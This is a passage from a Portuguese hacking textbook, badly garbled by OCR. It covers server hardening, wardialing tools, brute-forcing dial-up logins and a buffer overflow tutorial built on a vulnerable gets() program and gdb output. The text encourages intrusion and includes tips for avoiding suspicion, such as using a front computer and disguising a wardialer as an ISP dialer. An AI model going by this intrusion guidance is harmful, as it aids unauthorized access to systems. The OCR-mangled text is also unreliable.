~Atualizeseusistema!Sistemasdesatualizadossãograndesfontesdepro-
blemas,nãoapenasdesegurança,masdeestabilidadetambém.Seufornecedor
detecnologianormalmenteofereceatualizaçõesgratuitasquandoafalhaé
deles.Nãodeixepassar!
~Dispareumscancontravocêmesmo.Nãoesperequeumhackerdescu-
braquevocêusaumIISvulnerávelàfalhadeUnicodeouumSendmailcomo
conhecidoSendmailBug.Oupior:queseufl1"ewalléumqueijosuíço.Osscanners
estãoaíparaajudá-Io.Use-os!
~Desligueosserviçosdesnecessários.SevocêmontouumservidorWeb,que
serveapenasparaisso,porquevaiquererumSMTPescutandonaporta25,um
POPnaporta110eumXna6OO0?Deixerodandoapenasoqueefetivamenteserá
usado.Nãosóparadeixarmenosportasparaohackerusar,comotambémporque
vocêvaiseesquecerdeleenãoaplicaráospatchesdesegurançapertinentes.
~ReviseseufirewalI.Seosseusscansestãopassando,seufirewallprecisa
deumarevisão.Consideretrocarof11trodepacotescomumporumorientado
aestadosemelhoreasACLsdoproxynoladodedentrodoDMZ.Aliás,você
temumDMZ,nãotem?
~Instalesistemasdedetecçãodeintmsos,ouIDS.VeremossistemasIDS
nosapêndicesnoCD-ROM.Maséimportanteinstalarumdessesparagarantir
queseuslogsserãopreservadosequalquerinvasãosejaprontamenterastreada.
12441
Ataque,defesaecontra-ataque:Busca[

Universidade3°Ano
Contra-atacarnessescasos,emborapossível(poisumkiddieruidosoficaria
noslogs,emesmohackersexperientescometemdeslizes),nãoseriajustificá-
vel.Nesteponto,apesardeperigosamentenolimiar,ohackeraindanãoultra-
passouabarreiradalegalidade.Verifiquesempreseuslogseusepossíveis
scanseataquescomoavisosparaatualizarseussistemas.
12451
]Ataque,defesaecontra-ataque:Busca

Ataque,defesae
contra-ataque:
Invasão
''Abordarnaviosmercantes
invadir,pilhar,tomaroqueénosso!...!
Prepararanossainvasão
Efazerjustiçacomaspropriasmãos. "I
RPM,"Rádio Pirata"
1.Do albuInRevoluçõesporIninuto.de198/>'

IUniversidadeH4CK3R I
"Porqueo cachorroentrounaigreja"?Anteessaperguntacapiciosa,amaio-
riadaspessoas,depoisde"raciocinar"umpouco,disparamrespostasdasmais
estapafúrdiaseincongruentesqueoserhumanopodesercapazdeconceber.
"Poqueopadrechamou"."Porqueosanjosoconduziramparaaplenitude
espiritual"."PorqueouviuumchamadodeAláparadestruirotemplodeidola-
triadosinfiéis"."Porquequis"."Porquesim"."Porquehaviaquermesseeele
sentiucheirodelingüiça"."Porqueestavanocolodadona"."Ah,vaitecatá,
mano"!Masarespostacorretaéamaissimpleselógicadetodas.Ocachorro
entrounaigrejaporqueaportaestavaaberta.
Apartirdestepontoultrapassamososlimites.Alegislaçãobrasileiranão
reconheceoacessoasistemasqueestejamabertosàInternetcomoinvasão,da
mesmaformacomoentrarnumshoppingcentertambémnãoéinvasão:as
portasestãoabertasparatal.
Pelaleinorte-americana,entretanto,essetipodeinvasão(desistemasede
shoppingcenters)jáéconsideradoinvasãodepropriedade.Sevocênãoébem
vindoemumsistema,podeserprocessadoseentrar.Senãoébemvindoemum
shoppingcenter,tambémpode!Houvepelomenosumcaso,divulgadopelaim-
prensa,deumcidadãoamericanoprocessadoporinvasãodepropriedadepor
estarnaáreapúblicadeumshopping.Explico:eleestavacomumacamiseta
pacifista(afraseexataera"Givepeaceachance",deJoOOLennon)easegurança
doshoppingsolicitouqueeleretirasseacamisetaoudeixasseoprédio.Como
recusou-seaambasascoisas,foipresoeprocessado.Homeofthefree...
Cuidado,portanto,quandoinvadirsistemasgeograficamenteinstaladosláou
pertencentesaempresasdaquelepaís.Vocêseráprocessadopelasleisdelá,e
éprovávelquesejaextraditado.Hackerismo=Terrorismo=PrisãoPerpétua...
Jádeupranotar,né?
Ainvasãoemetapas
Assimcomodividimosnossoataqueemseispassosdiferentes,opassoqua-
tro-invasão-podeserdivididoemduasetapas.
Aprimeiraetapaéo
acessoaumhostdarede.Comovimosnoscapítulosde
redes,asredesinternasdasempresasnormalmente nãoutilizamnúmerosIP
roteáveispelaInternet.Portanto,temosqueinvadirprimeiramenteumcomputa-
dorlimítrofequepossuaduasinterfacesderedee,portanto,atendaaambas.
Normalmente éopróprioftrewall,ouumproxy,masépossívelquefalhasde
configuraçãooumesmodescuidopossamescancararoutrossistemas.
Paraaprimeiraetapa,umnúmerolimitadodetécnicaspodeseempregado.Entre
eles,aprocurapormodemsaceitandoconexõesexternas(wardialing)eaexplora-
çãodefalhasespecíficasatravésdeexploits.Observequenenhumsistemaemespe-
cialévisado.Oscrackerspodemapontarsuasmirastantoemservidorescomoem
estaçõesdetrabalhoemesmoemcomponentesderackcomoroteadoreseafins!
12481
Ataque,defesaecontra-ataque:Invasão[

Universidade3°ano
Asegundaetapaémaistrabalhosaquedifícil.Umavezconseguidooacessoàrede
interna,passa-seàinvasãosistemáticadoscomputadoresdentrodarede.Essa
etapapressupõequebradesenhaseacessoaáreasrestritasmesmoparaquemestá
dentro.Dizemosqueétrabalhosaporque,umavezdentro,cadaumdossistemas
autônomosdisponíveisparaosusuáriosinternosrequertodaaquelametodologia
quevimos:Planejamento,Observação,Busca,Invasão,ManutençãoeEvasão.Enão
esqueça:váriosmicroataques1-2-1-3-1-4-1-5-1-6-1...Semprecorrijaeajusteseupla-
nos!Ascoisasmudam,osdadosmudam,oadministradormudaevocêsempretem
informaçõesnovas.Sequersucesso,organize-se!
E,sevocêforumlammer,nãotemoquefazerporaqui,jáquevocênãoquersaberde
aprendernada.Vábrincarcomosexploitspublicadosedeixeosprofissionaistrabalharem!
WarDialing+BruteForce
Redesbemconfiguradaspermitemacessoaelasapenasporpontosbemespe-
cíficosecontroladíssimos,normalmenteumaúnicaconexãocomaInternet.
Empresasmuitograndespossuemvárioslinks,mastodoselessão(oudeveriam
ser)controladosemonitoradoscomrigor.Entretanto,algunsfuncionários"es-
pertos"tentamdriblaralentidãoouoscontrolesdeacessoasitesnão-autoriza-
doscomconexõesdiscadasouADSLligadosdiretamenteasuasestações.Esses
funcionáriosnãotêmnoçãodoperigorealrepresentadoporessaprática:tais
conexõessãototalmentedesprotegidas,eumavezcomacessoaessasconexões,
ohackerjáestádentrodarede,epodequeimardiversasetapasdesuainvasão.
Emoutrasocasiões,aprópriaempresaprecisaproporcionaracessodiscado
aseusfuncionáriosviajantes,ouaosquetrabalhamemcasa.Paratanto,possu-
emumabateriademodemsedezenasdenúmerosdetelefonedisponíveispara
receberchamadaseconexões.Umpratocheioparahackers!
Sim,sim,nãoiadeixardecomentarqueotermoWarDialingfoicunhadono
filmeWarGamesde1983emqueMatthewBroderickdiscavaparatodosos
númerosqueeleconseguiaatrásdemodemslivres.Masissoprovavelmente
vocêjásabe.Senão,váatésualocadoraepeçaofilmeJogosdeGuerra.Senão
éumfilmeexcelente,pelomenosasreferênciastecnológicasestãocorretas
-
dentro,éclaro,doslimitesdaprecisãohollywoodiana.Maisinformaçõespo-
demserencontradasemorbita.starmedia.com/-necrose/Sci-Fi/Filmesl
wargames.htm,www.movieprop.com/tvandmovie/reviews/wargames.htme
jbonline.terra.com.brIjb/papel/cadernos/internet/200 11081151
jorinf20010815003.html.
Conheçasuasarmas
Wardialingéguerra.Sevocêéumsoldado,vaiàguerraenãolevasuaespa-
da,estáfrito!Asferramentasusadaspeloswardialerssãochamadas,normal-
mentede...wardialers.UmabuscanoGoogletrariadiversossitescomessas
12491
IAtaque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
ferramentas,amaioriagratuitasemuitasdelascomcódigofonteabertoelivre.
Mas,emumaexcepcionalcolherdechá,aívaiumlinkcomalgumasdelas:
neworder.box.sk/box.php::)?gfx=neworder&prj =neworder&key
=wardil&txt=Wardia1ers.
Recomendamosepecialmente,entreeles,oTHCScan(www.thc.org).Éafer-
ramentan°1deWarDialinghojeemdia.FoidesenvolvidaparaDOS,maspode
serusadaemUnixcomemuladores,comooDosemu.
Sevocêquerdarumaolhadaemcomoascoisascomeçaram,procurepor
DemonDia1erepeloToneLoc.Sãoferramentasparecidascomasqueos
PhreakersusavamnaépocadoftlmedeBroderick,incluindooprópriomock-
updacena.
ParaUnix,alémdoexcelenteTHCScan+Dosemuháalgunsnativoscomoo
WARD,cujadescriçãoestánoendereçowww.securiteam.com/tools/
6TOOOIP5QM.htmlepodeserbaixadoewww.Oxdeadbeef.info/code/ward.c;
oupérolascomooJerichoeoShockDial,ambosencontráveisem
www.securityfocus.com/tools/category/26.
Hátambémmuitoswardialerscomerciais,destinadosapermitirqueempresas
testemsuasinstalaçõesàprocurademodemsperdidos.Umadasmaiscompletasé
oPhoneSweep(www.sandstorm.net).Alémdaexcelênciadosoftware,aempresa
prometeconsultoriaesuporteporassinatura(compagamentomensal).
$
$ _1005
~1006
1'1.11*
2001-07-2003:25
2001-07-2019:51
2001-07-202052
2001-07-2021:40
2001-07-2022:26
1'1.11*
2001-07-1822:13
2001-07-1822:15
1'1.11*
2001-07-1823:42
1'1.11*
1'1""
2001-07-1901:42
1'1.11*
1'1.11*
2001-07-1922:08
1'1.11*
1'1.11*
n1'1
EI
$ ~1001
~} ~1002
1iilà1003
~1004
$
$
[tI-
[tI-
250I
Ataque,defesaecontra-ataque:Invasão
8USY Unknown
8USY Unknown
8USY Unknown
BUSY Unknown
BUSY Unknown
NOJACSIMILEUnknown
CARRIER Unknown
VOICE Unknown
TIMEOUT Unknown
VOICE Unknown

Universidade3°ano
Umalistadeequipamentosreconhecidamentevulneráveisedetectáveispelo
PhoneSweeppodemserencontradosemwww.sandstorm.net/products/
phonesweep//sysids.shtml.
OutraopçãoéoTeleSweep,daSecurelogic.Maisinformaçõesem
telesweepsecure.securelogix.com.
Nossarecomendação:baixe,instaleebrinquecom,pelomenos,asferramen-
tasgratuitaslistadasaqui.Vocêvaidescobrirque,nestaépocadeADSLeCable
Modem,aindaexistemMUITOSmodemsdiscadosrecebendochamadasporaí,
especialmenteemempresas.
Outradica:vocêpodeusarosdiscadoresdosprovedoresdeacessocomo
WarDialersimprovisados!!!Amaioriadelespossuemumarquivoexternocom
alistadenúmerosdetelefonedeconexão.Bastasubstituiressalistaporuma
especialmentecriada,evocêteráumwardialerinstantâneo,inclusivecom
rediscagemautomáticaevarreduradetodososnúmerosdalista.Baixeos
discadoresdetodososprovedoresquevocêselembrareverifique.Estadicaé
muitoútilquandoseestáusandoumcomputadorlaranjacomodiscadorenão
sequerlevantarsuspeitascomprogramasespecializados.UmTHCScanlevan-
tariasuspeitasnocomputadordoseutio,masodiscadordoiG(oudoTerra,
doiBest,doUOLoudaAOL...)passariadespercebido,aindamaisseoseutio
forassinantedeumdessesprovedores.
Ah,aforçabrutaétãolinda...
Certo,vocêdescobriunúmerosdetelefonequepossuemmodemsatendendo
achamadosexternos.Maseagora,oquêfazercomeles?Entraagoraemcena
outrotipodewardialerque,aoinvésdevarrernúmerosatrásdemodems,faz
inúmerastentativasdeloginemummesmonúmero.
Seemoutrostiposdecontroledeacessoporloginesenhaépossívelencon-
traroutrosmeiosdeentradaalémdobrute-force,commodemsacoisaédife-
rente.Vocênãotemqualqueroutrainformaçãoalémdopromptdosistema
pedindoumusuárioválido.Suaúnicasaídaéusarumprogramadeforçabruta
paratentarentrar.Logicamente,usarsuaslistasdepalavras(quevimosnos
capítulossobrevulnerabilidades)esaberonomedealgumusuárioajudamui-
toaqui.Atençãolammers!UsarSQLinjectionemmodemséademonstraçãode
burricemaisenfadonhaquevocêpoderiacometer.Nãoquefaçaalgummal,
masmostraclaramentequevocênãoentendenadadenada,mesmo...Vábrin-
cardecarrinhooudeboneca!
SevocêusouoTHCScan,umbomcompanheiroparaeleéoTHCLogin
Hacker.Baixe-oevejacomoéfácilentrar,quandoseencontraummodem
"compreensivo".Nositeoficialhádiversosprogramas,exploitsebrute-forcers
paramuitosprotocolos,incluindo5MB,HTTP,FTPeProxy.Verifiqueem
www.thc.org/releases.php.
Apropósito,THCéacrônimoparaTheHackersChoice...Apesardaarrogân-
1251
I
IAtaque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
ciaepresunçãodotítuloauto-outorgado,asferramentassãorealmentemuito
boas.Nositeaindaencontramosdiversoswhitepaperssobreinvasãoesegu-
rançadignosdeleitura.
Entendendooestourodepilha
(bufferoverflowJ
Váriosexploitsvalem-sedoschamadosbufferoverflowsparaconseguirum
shellnossistemasvulneráveisaeles.Osscriptkiddiesaplicampesadamente
taisexploitsemsuaspresassemsaberexatamenteoquesãoecomofuncio-
nam.Comoqueremostermaisdoquenoções,naverdade,umentendimento
completodecomoessasferramentasoperam,teremosqueescovarumpouco
maisdebits,dessavezolhandoatentamenteocódigodosaplicativos.Nãoé
precisodizerqueseránecessáriodesenferrujarseusconhecimentosdelingua-
gensdeprogramação,masnadadeoutroplaneta.
Comoonomeéestourodepilha,obviamenteháumapilhaaserestourada
(dããã!).Paraentendercomooestourofunciona,devemos,primeiramente,
conceituaroqueseriaessataldepilha.
Umamontoadodecoisas...
Apalavraportuguesapilhanostrazàcabeçaduasimagens:
1.Umapilhadepedras,depratos,demoedas,decorposnofilmedoStallone...
2.Umacéluladeenergiaelétricausadaemlanternasportáteisebrinquedos.
Peguemosaprimeiraimagem.Umapilhademoedas,porexemplo,daquelas
queoTioPatinhastememcimadesuaescrivaninhanacaixa-forte.Oadorável
pão-durodePatópolisarrumadiligentementesuasmoedinhas,umasobrea
outra.Comisso,quandovaiguardá-Iasnacaixa-forteobomávaroretiracuida-
dosamenteaprimeiramoedaeapõenosacodedinheiro,depoisasegunda,
depoisaterceira...Observeumdetalhe:aprimeiramoedaaserretiradafoia
ultimaasercolocada.
Noexemplodapilhadepedras,FredFlintstoneusandoseutratorossauro
recolhepedrasretiradasdaencostaeasempilhanolocalindicadopeloSr.
PedregulhoSlate,seuchefe.Noteque,nessecaso,aspedrasqueFredpega
primeirosãoasquevãoficarporbaixodapilha.Mastalvezomelhorexemplo
(emaisútil)sejamesmoodapilhadepratos.Podemosinclusiveusarumexem-
plodepilhasrecursivas.Quandoospratosestãosujosnamesaealouçadodia
ésua(...),vocêrecolhe-oseosempilhanasmãosouemumabandeja.Observe:
oúltimopratoquevocêpegouficanotopodapilha.Quandochegaàcozinha,
fazocaminhoinverso.Comonãodápracolocarapilhatodadeumavez,você
pegapratoporpratoeosempilhanovamente,destaveznapia.Àmedidaque
osvailavando,vocêosempilhapelaterceiravez(agorajálimpos)dooutro
1252
I
Ataque,defesaecontra-ataque:Invasãor

Universidade3°ano
ladodacuba,enovamenteoqueeraúltimoficouprimeiro.Paraguardá-Iosno
armário...é,achoquevocêjáentendeu.
Easpilhasdelanterna?Elasnãotêmmuitohavercomopapoagora.Sópor
curiosidade,onome"pilha"édadoaesseelementogeradordeenergiaporqueas
primeirascélulasquimio-elétricaseram,er,bem,diversosdiscosdemetaisdife-
rentes(parecidoscommoedas,àsvezesmoedasmesmo!)alternadosentresie
mergulhadosemumasoluçãoácidaousalgada.Pensandobem,atétemhaver...
AspiLhasnoreinodigitaL
Eoquetêmoscomputadorescomisso?Pegandoemprestadoanoçãode
pilhas,osprogramasemgeral(eossistemasoperacionaisemparticular)po-
dempegarfragmentosdedadoseosguardaremáreasdememóriachamadas
pilhasoustacks.Éumamaneirafácildearmazenarpequenosdados,poisnum
acesssoconvencionaldememóriaoprogramaéobrigadoa:
1.Defmiraposiçãodememóriaondeodadoseráguardado;
2.Defmirotamanhoembytesqueodadoterá;
3.Reservaressetamanhoembytesnaposiçãodefmida;
4.Mandarodadoparaessaposição;
5.Bloquearaposiçãoparaquenãosejasobreescrita.
Pararecuperarodado,oprogramateráque:
1.Lembraraposiçãodememóriaondeodadoestá;
2.Apontarparaaquelaposição;
3.Lembrarotamanhodosdadosembytes;
4.Puxaressesbytesdaquelaposiçãodememória;
5.Liberaraposiçãoparausofuturo.
Nocasodapilha,nãohánecessidadedenadadisso.Oprogramapodesim-
plesmente:
1.Mandardadosparaapilha(push).
Nahoraderecuperá-Ios,basta:
1.Puxardadosdapilha(pop).
Éclaro,comoéumacessoseqüencialenãoaleatório,casoqueiramosusaro
segundodadodapilhaantesteremosqueretiraroprimeirodado.Issotraz
dificuldadesadicionaisparaoprograma,quetemque"darumjeito"degerenciar
osdadosdapilhacorretamente.Masháaplicaçõesondeessaabordageméa
melhor.Porexemplo,imaginequequeiramosfazerumprograminhaquefaça
umasomadetrêsvalores.Aformamaissimplesdesseprogramaseria:
1.Chamafunçãosoma(a,b);
1253I
]Ataque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
2.
3.
4.
5.
6.
7.
8.
Obtémprimeironúmeroeoentregaàfunçãosoma;
Obtémosegundonúmeroeoentregaàfunçãosoma;
Colocaoresultadonapilha;
Chamafunçãosoma(a,b);
Obtémterceironúmeroeoentregaàfunçãosoma;
"Puxa"otopodapilhaeentregaàfunçãosoma;
Soma(a,b)fazaoperaçãoejogaoresultadonasaída.
Observequeoresultadodaprimeirasomaficouarmazenadonapilha,espe-
randoserchamadodevoltaaofluxonormaldoprograma.Umasoluçãocomo
essaenvolvendoposiçõesdememóriademandariafunçõesparareservarme-
móriaparatrêsvariáveis,envioerecuperaçãotriplicadadedadosepossivel-
menteumafunçãosomamaiscomplexa.
Esseexemplofoididático,maslongedoideal.Vamosverumpequenopro-
gramaemC.Deverodardeformaidênticaemqualquerplataforma,poisnão
usabibliotecasespecíficas.
voidfuncao_idiota (void)
charxuxu[5];
gets(xuxu);
printf(ll%sll, xuxu);
main()
funcao_idiota() ;
returno;
Nãosepreocupe,vocênãoprecisarátervistoumprogramaCalgumavezna
vidaparaentenderesteaqui.Vejasó:qualquerlinguagemestruturadaquese
prezepermitequevocêcrie,comoscomandosbásicosqueelapossui,funções
maiscomplexasparaseremusadaspeloprogramaprincipal.Emnossoexem-
plo(eemqualquercódigoC),oprogramaprincipalé"marcado"pelafunção
main().Dentrodaschaves{e}temosoprogramacompleto,compostopor
duasoutrasfunções:
main()
funcao_idiota() ;
returno;
12541
Ataque,defesaecontra-ataque:Invasãor

Universidade3°ano
funcao_idiota()chamaumafunçãocriadapornósmesmos,edeclaradano
iníciodoprograma.Jáapróximalinha,returnO,indicaqueoprogramadeve
encerrarnessalinhaeretornarparaoshellqueachamou.
Temosquededararfuncao_idiota()antesdelapoderserusada.Então,vamosaela!
voidfuncao_idiota(void)
{
charxuxu[5];
gets(xuxu);
printf(H%sH, xuxu);
Afunçãoé,agrossomodo,umasub-rotinaquepodeserusadaváriasvezes
dentrodoprograma.Emnossomain()ausamosapenasumavez,masseria
possível,sequiséssemos,usá-Iaemdiversoslocaisdocódigo.Oqueessaidioti-
cefazé:1)criarumavariávelchamadaxuxucomumtamanhode5bytes;2)
usarafunçãogets()dalinguagemCparapegarcaracteresdotecladoejogá-
losnavariávelxuxu;3)usarafunçãoprintf()parajogaroresultadonatela.
SevocêestáemumamáquinaUnix,podecompilaroprograminhaetestá-lo.
Namaioriadossitemas,useocomando:
$cc-oidiotaidiota.c
Sendoidiota.coarquivotextocontendoocódigodoprogramaeidiotao
arquivoexecutávelgeradopelocompiladorcc.NoLinuxenoFreeBSDuseo
gccemvezdocc.
Pararodaroprograma,digite:
$./idiota
Aparentemente,nadaacontecerá.Tentedigitarumcaracterequalquerepres-
sionaratecla<Enter>.Ocaracterseráreplicadonatela.Ésóissooqueo
programinhafaz.
EmumamáquinaDOSouWindows,oprocedimentoéparecido.Procurepor
algumcompiladordelinhadecomando.Senãosouberondeprocurar,comece
comalgunsdestes.ExperimenteTODOSeescolhaseupreferido!
ParaDOSpodemosindicar:
~DJGPp,oGCCdoDOS:www.delorie.com/djgpp:
~OvenerávelBorlandTurboC2.01(Autorizado!Nãoépirataria!):
community.borland.com/museum;
~PacificC:www.elrincondelc.com/compila/pacific.html;
ParaWindows,existem,entremuitas,asseguintesopções:
~iCCWin32:www.cs.virginia.edu/-lcc-win32/index.html;
~DevCPP:www.bloodshed.net/devcpp.html(aescolhadosautores!);
Aliás,emwww.bloodshed.netexistemlinksparacompiladoresdediversas
linguagens!Confira!
1255I
IAtaque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
Voltemosaonossoprograma.Quandoomain()chamafuncao_idiota(),o
processamentodoprogramaprincipaléinterrompidoedesviadoparaafun-
ção.Quandoafunçãoterminaseuprocessamento,retomaàrotinaprincipal.
Observeocódigonovamente,destavezcomofluxodeprocessamentoindica-
doporsetas:
voidfuncao_idiota (void)
charxuxu[5];
gets(xuxu);
Retomaao
programa
principal
printf(il%sil, xuxu);
return; Desvio
do
processamento
main()~
{ Inicioaqui
funcao_idiota() ;
returno;
..Fim!
Bonito,não?Emprincípio,fun-
ciona.Mas,parainterrompero
processamentodemain(),é
neceesáriocolocartudooque
main()estejafazendoemalgum
lugar,desviaroprocessamento
parafuncao_idiota(),processar
oqueestiverláedepoisretorar
amain().A1émdedevolverospos-
síveisvaloresdafunçãochama-
da(oquenãoénossocaso
-para
simplificarnãopassamosargu-
mentosentreasfunções),tam-
bémprecisamosterummeiode
saberONDEnamemóriaestava
oprocessamentodemain()para
queretomemosoprocesso.
Complicado?Tambémachei.
Umailustraçãoajudabastante!
12561
Ataque,defesaecontra-ataque:Invasão [
TOpOdaMemória
t
Dadosanterioresdapilha
Dadosdemain()
PonteirodeRetorno
PonteirodaPilha
Dadosdafunçãoidiota()(ou
seja,avariávelxuxu)

Universidade3°ano
Nooofaaaa(ComFmesmo.Linguapresa...)!Masnãoeraumapilha?Porque
estádecabeçaparabaixo?Bem,normalmenteaspilhassãoarmazenadasde
cimaparabaixo,sendoodadomaisantigonaposiçãomaisaltadememóriae
apilhacrescendoemdireçãoàposiçãomaisbaixa.Pensenelacomoumapilha
demoedasfeitanotetoemdireçãoaochão.Talvezvocêtenhaqueusarcola
paraprenderasmoedas,masaindaassiméumapilha.
Comodissemos,osdadosdemain()sãojogadosnapilha.Notequeelanão
precisaestarnecessariamentevazia,podendoconter,porexemplo,dadosdo
shelloudajanelaondeoprogramafoichamado.Depoisdomain(),tambémé
guardadonostackumponteiro,chamadodeponteirodeendereçoderetorno
oureturnaddresspointer.Éelequeindicaaoprocessamentoondeencontrara
próximainstruçãodepoisdodesvio(ondeéqueeuestavamesmo?).Emnosso
casoespecífico,oreturnpointerguardaoendereçodememóriaonderesidea
instruçãoreturnO.
Depoisdoponteiroderetorno,osistemacolocaumponteirodepilha,que
apontaparaumatabelacomdadosdecontrolesobreaprópriapilha
-que
obviamenteoleitorcompreendesernecessária.Porúltimo,vãoosdadostem-
poráriosdenossafunçãosecundária,chamadapormain().Emnossocaso,éa
variávelxuxu,criadapelanossafunçãofuncao_idiota().
Quandoafunçãosecundáriaterminaseuprocessamento,osdadosdelasão
retiradosdapilha,depoisoponteirodecontroledapilha,depoisoponteirodo
endereçoderetorno.Quandooprocessamentoéretomadonaposiçãooriginal,
osdadosdemainsãopuxadosdapilhaetudovoltaasercomoeraantes.Será?
Debugisonthetable2
Lembremosdedoisdetalhesvistosnosparágrafosanteriores.Osegundo
tenhocertezaquefoiassimiladopeloleitorapenascomocuriosidade,opri-
meirodeveterpassadodespercebido:
1.Avariávelxuxufoideclaradacomocontendoapenascincobytes;
2.Apilhaarmazenadadosdebaixoparacima.
Láatrásnóstestamosnossoprograminhaassim:
$./idiota
a
a
$
Quandooprocessamentochegounafunçãogets(),digitamosaletra"a".A
funçãogets()colocou"a"dentrodavariávelxuxu,quefoiimpressanalinha
seguintepeloprintf().Lembre-sedequexuxutemumtamanhodeapenas
cincobytes.Oqueacontecesepassarmosdecinco?
2.Auladeinglêsgeek?Essafraserealmentefoidita,duranteumaconversaentreeueodiretorde
informáticadeumaempresadeaviação.Umestagiárioouviuapalavradebugnomeiodaconversaesaiu-
secomesta.Atéhojeeueessediretordeinformáticausamosaexpressãocomopiadalocal.
12571
]Ataque.defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
Bem,tentamoscomcincoletras"A:',asaídafoiAAAAA.Comseis,AAAAAA.
Comsete,AAAAAAA.Comoito,aconteceualgointeressante:
$./idiota
AAAAAAAA
AAAAAAAA
Falhadesegmentação(coredumped)
$
Falhadesegmentação!Oprogramafalhouegerouumrelatóriodeerros
comoconteúdodamemória,gravadonoarquivocore.Oqueseráqueaconte-
ceu?Lembremosagoradapilha.Oespaçoparanossavariávelxuxu(quepode-
moschamardebuffer)erade5bytes-nósmesmosdefinimosisso(char
xuxa[5]).Cadacaracterocupa1byte,portanto5caracteresencheobuffer.
Masosistemanãopossuinenhummecanismodechecagem,oumelhor,alin-
guagemCnãopossui.Portanto,secolocarmosmaisde6caracteresnobuffer,
haveráestouro.Osdadosamaisserãoescritosporcimadealgumaoutracoisa
(normalmentealgomuitoimportante...).
Agora,osegundodetalhe.Apilhaarmazenadebaixoparacima.Portanto,se
vocêolhararepresentaçãográficaquefizemosdela,vainotarqueosexto
caractervaiserescritosobreoPonteirodaPilha!
Oponteirodepilhapossuiváriosbytes(édetamanhovariável)eoderetomo,
4bytes3.Éporissoque,quandoescrevemos6ou7caracteres,nadaacontece-
estamossobrescrevendooponteirodapilha,emalgumaregiãoquenãonos
afetaimediatamente.Apartirdooitavocaracteretemosumproblemaimediato:
estamossobrescrevendoalgumaáreaimportantedoponteirodepilha.
Seavançarmosmaisumpouco,lápelodécimo-quartooudécimo-quinto
caractercertamentechegaremosaoponteiroderetorno!!!!!Agoraoprimeiro
bytedoendereçoderetomonãoserámaisoendereçooriginal,seráovalor
hexadocaracterquedigitamos!SeforA,porexemplo(aveAleph1!)ovalor
hexadecimalserá41h.Vamosdepurarnossoprogramausandoogdb,um
depuradorGNU-paraDOS,procureumaferramentaadequada(comoodebug)
ouuseumadasmáquinaLinuxdanossarededetestes.Primeiro,vamosrodar
nossoprogramaegerarumcoredumpcommuitos"A"s:
$./idiota
Falhadesegmentação(coredumped)
$
Agora,vamosrodarogdbeveroqueelenosdiz:
$gdbidiotacore
GNUgdb5.1
3.Explicaçãotécnicaavançada:osponteirostêmquatrobytesdecomprimento,ou32bits,oque
equivale aumvalordecimal entreOe4.294.967.295, ouseja,4GB.
2581
Ataque,defesaecontra-ataque:Invasão[

Universidade3°ano
Copyright2001FreeSoftwareFoundation,Inc.
GDBisfreesoftware,coveredbytheGNU...
(corta)
(nodebuggingsymbolsfound)...
Corewasgeneratedby'./idiota'.
Programterminatedwithsignal11,Segmentationfault.
Readingsymbolsfrom/lib/libc.so.6...
(nodebuggingsymbolsfound)...done.
Loadedsymbolsfor/lib/libc.so.6
Readingsymbolsfrom/lib/ld-linux.so.2.. .done.
Loadedsymbolsfor/lib/ld-linux.so.2
#0Ox41414141in??()
(gdb)
$
Alinhaimportante,porenquanto, é#0Ox41414141in?? ().Elaindica o
endereçoderetomo.Observeque,emvezdoendereçocorreto,temosnosso
caracterA(41h)repetidováriasvezes.Belamaneiradefazeroprogramaabor-
tar!Nossoprograminhaterminaporalimesmo,masfaçamosumteste:entre
aslinhasfuncao_idiota()eretumO;coloqueaseguintelinhaprintf():
{
funcao_idiota() ;
printf(llNao atingiuPonteiro deRetorno!ll);
returnO;
}
Agoracompileerodeoprograma.Vocêveráque,até11caracteres,amensa-
gemfmalémostradaantesdocoredump.Com12caracteresoumais,amensa-
geméperdida:atingimosoponteiroderetorno!Essevalor,claro,dependedo
programa,dosdadosgravadosnostack,dotipodedadosdonossobuffer,etc.
Ganhandoacesso
porestourodepilha
Sóqueenfiarumbandode"A"snobuffernãoémuitoútil.Esepudéssemos
executaralgumcódigodemáquina(sim,temquesercódigodemáquina,afmal
oprogramaestácompilado...)?Poderíamosexecutarumapequenarotinacar-
regadanoprópriobuffer,queéoúnicolugaraquetemosacesso.Desviaro
processamentoparaobuffernãorequerpráticanemhabilidade:játemoscon-
trolesobreoponteiroderetomo,bastacolocarneleoendereçodobufferem
vezdamontoeirade"A"s.
I259I
IAtaque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
NotequeesteprocedimentoébemparecidocomainjeçãodeSQLquevimos
nocapítuloVulnerabilidades11.Usamosumcampoacessívelexternamentepelo
usuário-nocasodoSQL,umcampoemumformulário;aqui,umavariável
solicitandodados-einjetamosneleoscomandospertinentes.
Falamosemcódigodemáquina,nãoé?Aquitemosograndepulo-do-gatodos
exploitsqueseaproveitamdobufferoverflowdealgumprogramamalescri-
to.Nósqueremosganharumshellnosistema,eissodependedosistema
operacional.OprogramaqueofereceoshellnumSolarisnãoéomesmodeum
MacOSquenãoéomesmonoWindows...Poroutrolado,parachamaresse
shelltemosquecolocarumcódigodemáquinanobuffer,oquequerdizerque
temosquefazerumexploitparacadaduplaSO+Hardwareexistente.Umexploit
paraLinuxemAlphanãoéomesmoqueumparaLinuxemi386(osPCs
comuns).Éomesmosistemaoperacional,masnãoomesmoprocessadot.Por
outrolado,umPCrodandoWindows2000vaiprecisardeumexploitdiferen-
tedoqueumSolarisrodandonomesffiÍssimoPc.Éomesmoprocessador,mas
nãoomesmoSO.Mesmoconsiderandoqueestamosusandoomesmoprogra-
mabugado(porexemplo,ointerpretadordePerIdecadaumdosSOs)oexploit
desseprogramavaiserdiferenteemcadacombinaçãoSO+HW
Parafmsdidáticos,vamosnosateraoPCeaoLinux.Vamos"desassemblar"
nossoprograminhacomogdb:
$gdbidiota
***mensagensdiversas***
(gdb)disassmain
Dumpofassemblercodeforfunctionmain:
%ebp
%esp,%ebp
Observealinha
Ox804846a<main+6>:
cal1
260 I
Ataque, defesa econtra-ataque: Invasão [
$Ox8,%esp
Ox8048430<funcao_idiota>
$Oxfffffff4,%esp
$Ox8048520
Ox8048334<printf>
$OxlO,%esp
%eax,%eax
Ox8048483<main+31>
OxO(%esi,l) ,%esi
OxO(%edi,l) ,%edi
Ox8048430<funcao_idiota>
Ox8048464<main>: push
Ox8048465<main+l>: mov
Ox8048467<main+3>: sub
